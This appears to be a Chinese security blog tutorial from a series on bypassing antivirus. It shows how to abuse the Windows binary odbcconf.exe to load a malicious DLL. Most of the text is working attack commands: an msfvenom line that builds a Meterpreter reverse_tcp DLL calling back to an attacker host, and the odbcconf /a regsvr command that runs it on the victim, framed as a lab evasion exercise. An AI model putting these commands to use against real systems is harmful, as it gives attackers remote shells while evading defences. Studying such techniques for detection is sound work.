声明：Tide安全团队原创文章，转载请声明出处！文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

Odbcconf.exe是一个命令行工具，可让您配置ODBC驱动程序和数据源名称（微软官方文档https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver15）。

Odbcconf.exe在windows中的的一般路径为C:\Windows\System32\odbcconf.exe  C:\Windows\SysWOW64\odbcconf.exe

通过文档可发现有两种方式来加载dll，/A和/F

攻击机：kali    ip地址：192.168.10.130

靶机：win7     ip地址：192.168.10.135

使用msfvenom生成shellcode,注意生成的是dll格式

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f dll > hacker.dll

设置监听：

靶机运行payload：

odbcconf.exe /a {regsvr C:\Users\Administrator\Desktop\hacker.dll}

成功上线：

这个也被杀软盯上了，行为检测预警。

基于白名单Odbcconf执行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/82_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95Odbcconf%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%AD%A3.html